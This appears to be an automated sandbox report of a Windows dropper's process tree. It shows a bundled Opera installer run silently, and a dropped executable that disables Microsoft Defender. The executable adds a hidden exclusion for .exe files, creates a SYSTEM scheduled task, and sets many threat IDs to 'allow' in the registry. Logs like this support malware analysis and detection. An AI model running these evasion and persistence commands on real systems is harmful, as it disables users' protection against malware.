C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 17884⤵
- Program crash
PID:644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20764⤵
- Program crash
PID:1312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21724⤵
- Program crash
PID:4868
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21324⤵
- Program crash
PID:5828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 16724⤵
- Program crash
PID:2264
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21684⤵
- Program crash
PID:3140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\yBL5Tn5Z\zxkZvB0X70uuGxQ3YH.exe"4⤵PID:5436
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\yBL5Tn5Z\zxkZvB0X70uuGxQ3YH.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5140
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21204⤵
- Program crash
PID:1948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18124⤵
- Program crash
PID:4056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 19324⤵
- Program crash
PID:5156
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 15804⤵
- Program crash
PID:5856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 16644⤵
- Program crash
PID:2572
-
-
C:\Users\Admin\AppData\Local\Temp\yBL5Tn5Z\zxkZvB0X70uuGxQ3YH.exeC:\Users\Admin\AppData\Local\Temp\yBL5Tn5Z\zxkZvB0X70uuGxQ3YH.exe --silent --allusers=04⤵
- Executes dropped EXE
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exeC:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exe --silent --allusers=0 --server-tracking-blob=Y2QzZjFjM2QyNzJkMzE5YjNkMjI3NmM2NjY4ZWMxZDk4ZTRkMzMxNzUzOTA1ZjVkOTM3ZDEyMDUxMDhjYzYxZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjA5ODM3NDEuODk3NiIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiNTM2NzYyMTMtNTZkYi00OWMwLThlMDctODA5NDU2ZDc4Y2NmIn0=5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:1924 -
C:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exeC:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x6fb5b1f4,0x6fb5b200,0x6fb5b20c6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5852
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1924 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240714190227" --session-guid=7480731b-2035-4d4a-bb33-d82ae383b0a0 --server-tracking-blob=NTZlOWEwOTVhNGY0NzBiNTkzNzkyYzk3Y2IzMmQzZTA2MjhkOTdkYWQzNzYyNjAxZmQyMjJjMzkyMmRjNzAxZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMDk4Mzc0MS44OTc2IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI1MzY3NjIxMy01NmRiLTQ5YzAtOGUwNy04MDk0NTZkNzhjY2YifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=8C040000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exeC:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x338,0x33c,0x340,0x308,0x344,0x6d05b1f4,0x6d05b200,0x6d05b20c7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3152
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141902271\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141902271\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"6⤵
- Executes dropped EXE
PID:472
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141902271\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141902271\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2940 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141902271\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141902271\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0xaa9f88,0xaa9f94,0xaa9fa07⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5532
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exe"4⤵PID:5456
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18684⤵
- Program crash
PID:3660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 11444⤵
- Program crash
PID:4008
-
-
C:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exeC:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:2568 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:5528
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:5888
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:792 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:5144
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 19:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exe\" z0 /DtdidU 757674 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3096
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2568 -s 8765⤵
- Program crash
PID:3192
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18164⤵
- Program crash
PID:3556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20204⤵
- Program crash
PID:1088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18924⤵
- Program crash
PID:4140
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 9604⤵
- Program crash
PID:5932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18884⤵
- Program crash
PID:4824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20884⤵
- Program crash
PID:5060
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1928 -ip 19281⤵PID:3968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1928 -ip 19281⤵PID:1612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1928 -ip 19281⤵PID:1452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1928 -ip 19281⤵PID:5132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1928 -ip 19281⤵PID:4544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1928 -ip 19281⤵PID:5476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1928 -ip 19281⤵PID:4140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1928 -ip 19281⤵PID:5780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1928 -ip 19281⤵PID:3000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1928 -ip 19281⤵PID:5840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1928 -ip 19281⤵PID:5248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1928 -ip 19281⤵PID:4396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1928 -ip 19281⤵PID:5460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1928 -ip 19281⤵PID:1952
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1928 -ip 19281⤵PID:4556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1928 -ip 19281⤵PID:5832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1928 -ip 19281⤵PID:2712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1928 -ip 19281⤵PID:5532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1928 -ip 19281⤵PID:3900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1928 -ip 19281⤵PID:1200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1928 -ip 19281⤵PID:6112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1928 -ip 19281⤵PID:2344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1928 -ip 19281⤵PID:5100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1928 -ip 19281⤵PID:1676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1928 -ip 19281⤵PID:4568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1928 -ip 19281⤵PID:5728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1928 -ip 19281⤵PID:3648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1928 -ip 19281⤵PID:684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1928 -ip 19281⤵PID:5372
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1928 -ip 19281⤵PID:3772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1928 -ip 19281⤵PID:4768
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 19281⤵PID:5068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 19281⤵PID:5248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1928 -ip 19281⤵PID:4396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1928 -ip 19281⤵PID:4988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1928 -ip 19281⤵PID:5020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1928 -ip 19281⤵PID:3228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1928 -ip 19281⤵PID:3392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1928 -ip 19281⤵PID:1820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1928 -ip 19281⤵PID:1732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1928 -ip 19281⤵PID:4932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1928 -ip 19281⤵PID:1504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1928 -ip 19281⤵PID:5492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 19281⤵PID:5324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1928 -ip 19281⤵PID:2120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1928 -ip 19281⤵PID:3496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 19281⤵PID:472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1928 -ip 19281⤵PID:2472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 19281⤵PID:3904
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1928 -ip 19281⤵PID:5128
-
C:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exeC:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exe z0 /DtdidU 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1720 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3556 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:452
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3504
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:6096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5084
-
-
